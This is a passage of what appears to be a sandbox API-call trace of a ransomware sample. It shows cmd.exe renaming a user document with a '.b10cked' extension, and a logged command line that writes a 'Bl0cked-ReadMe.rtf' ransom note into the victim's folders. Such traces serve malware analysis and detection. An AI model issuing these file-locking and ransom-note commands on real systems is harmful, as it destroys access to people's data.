_wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.993] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.995] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.995] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.995] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f1d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f1cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f1cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", 
_MaxCount=0x7) returned 3 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.995] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 
[0234.996] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.996] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.996] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.996] _wcsicmp (_String1="ieMCxg.pps", _String2=".") returned 59 [0234.996] _wcsicmp (_String1="ieMCxg.pps", _String2="..") returned 59 [0234.996] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps")) returned 0x20 [0234.996] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x191f08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.997] SetErrorMode (uMode=0x0) returned 0x0 [0234.997] SetErrorMode (uMode=0x1) returned 0x0 [0234.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", nBufferLength=0x104, lpBuffer=0x12eb5c, lpFilePart=0x12eb44 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", lpFilePart=0x12eb44*="ieMCxg.pps") returned 0x3d [0234.997] SetErrorMode (uMode=0x0) returned 0x1 [0234.997] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x12 [0234.997] _wcsicmp (_String1="ieMCxg.pps", _String2=".") returned 59 [0234.997] _wcsicmp (_String1="ieMCxg.pps", _String2="..") returned 59 [0234.997] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps")) returned 0x20 [0234.997] SetErrorMode (uMode=0x0) returned 0x0 [0234.997] SetErrorMode (uMode=0x1) returned 0x0 [0234.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", nBufferLength=0x104, lpBuffer=0x12efd8, lpFilePart=0x12ed70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", lpFilePart=0x12ed70*="ieMCxg.pps") returned 0x3d [0234.997] SetErrorMode (uMode=0x0) returned 0x1 [0234.997] SetErrorMode (uMode=0x0) returned 0x0 [0234.997] SetErrorMode (uMode=0x1) returned 0x0 [0234.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked", nBufferLength=0x104, lpBuffer=0x12f1e0, lpFilePart=0x12ed70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked", lpFilePart=0x12ed70*="ieMCxg.pps.b10cked") returned 0x45 [0234.997] SetErrorMode (uMode=0x0) returned 0x1 [0234.997] SetLastError (dwErrCode=0x0) [0234.997] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps.b10cked")) returned 0xffffffff [0234.997] GetLastError () returned 0x2 [0234.997] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", fInfoLevelId=0x1, lpFindFileData=0x12e6ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e6ec) returned 0x192118 [0234.998] FindNextFileW (in: hFindFile=0x192118, lpFindFileData=0x12e6ec | out: lpFindFileData=0x12e6ec) returned 0 [0234.998] GetLastError () returned 0x12 [0234.998] FindClose (in: hFindFile=0x192118 | out: hFindFile=0x192118) returned 1 [0234.999] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", fInfoLevelId=0x1, 
lpFindFileData=0x191ca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x191ca8) returned 0x192118 [0234.999] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked", nBufferLength=0x104, lpBuffer=0x12e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked", lpFilePart=0x0) returned 0x45 [0234.999] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", nBufferLength=0x104, lpBuffer=0x12e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps", lpFilePart=0x0) returned 0x3d [0234.999] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps")) returned 0x20 [0235.000] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\iemcxg.pps.b10cked"), dwFlags=0x3) returned 1 [0235.000] FindClose (in: hFindFile=0x192118 | out: hFindFile=0x192118) returned 1 [0235.000] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12e938 | out: _Buffer=" 1") returned 9 [0235.000] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.000] GetFileType (hFile=0x7) returned 0x2 [0235.378] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.378] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12e8c4 | out: lpMode=0x12e8c4) returned 1 [0235.378] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12e8f8 | out: 
lpConsoleScreenBufferInfo=0x12e8f8) returned 1 [0235.378] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.379] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x12e938 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.379] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12e91c, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x12e91c*=0x1a) returned 1 [0235.379] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.379] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.379] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.379] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.379] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.379] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.379] SetConsoleInputExeNameW () returned 0x1 [0235.379] GetConsoleOutputCP () returned 0x1b5 [0235.379] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.379] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.380] exit (_Code=0) Process: id = "628" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x8f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], 
"Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34988 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34989 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34990 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34991 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 34992 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34993 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34994 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34995 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34996 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 34997 start_va = 0x7ffdf000 end_va = 0x7ffdffff 
entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35354 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35355 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35356 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35357 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 35358 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 35359 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35360 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35361 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35362 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35363 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35364 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35365 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35366 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35367 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35368 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35369 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35370 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35371 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 35372 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 35373 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35374 
start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 35375 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 35376 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 35377 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 868 os_tid = 0xad8 [0234.941] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb0c | out: lpSystemTimeAsFileTime=0x2cfb0c*(dwLowDateTime=0xbf7edcc0, dwHighDateTime=0x1d440a9)) [0234.941] GetCurrentProcessId () returned 0x8f0 [0234.941] GetCurrentThreadId () returned 0xad8 [0234.941] GetTickCount () returned 0x4083a [0234.941] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb04 | out: lpPerformanceCount=0x2cfb04*=29173003523) returned 1 [0234.941] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.941] __set_app_type (_Type=0x1) [0234.941] __p__fmode () returned 0x76b331f4 [0234.941] __p__commode () returned 0x76b331fc [0234.942] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.942] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.942] GetCurrentThreadId () returned 0xad8 [0234.942] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xad8) returned 0x38 [0234.942] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.942] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.942] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.942] HeapSetInformation (HeapHandle=0x0, 
HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa9c | out: phkResult=0x2cfa9c*=0x0) returned 0x2 [0234.942] VirtualQuery (in: lpAddress=0x2cfad3, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.942] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.942] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.942] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.942] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.942] GetConsoleOutputCP () returned 0x1b5 [0234.942] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.943] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.943] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.943] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.943] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.943] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.943] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.943] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.943] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.943] GetEnvironmentStringsW () returned 0x4401b8* [0234.944] FreeEnvironmentStringsW (penv=0x4401b8) returned 1 [0234.944] GetEnvironmentStringsW () returned 0x4401b8* [0234.944] FreeEnvironmentStringsW (penv=0x4401b8) returned 1 [0234.944] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea0c | out: phkResult=0x2cea0c*=0x40) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0xf0, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x1, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x1, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x0, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea14, 
lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x40, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x40, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x40, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegCloseKey (hKey=0x40) returned 0x0 [0234.944] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea0c | out: phkResult=0x2cea0c*=0x40) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x40, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x1, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x1, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x0, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, 
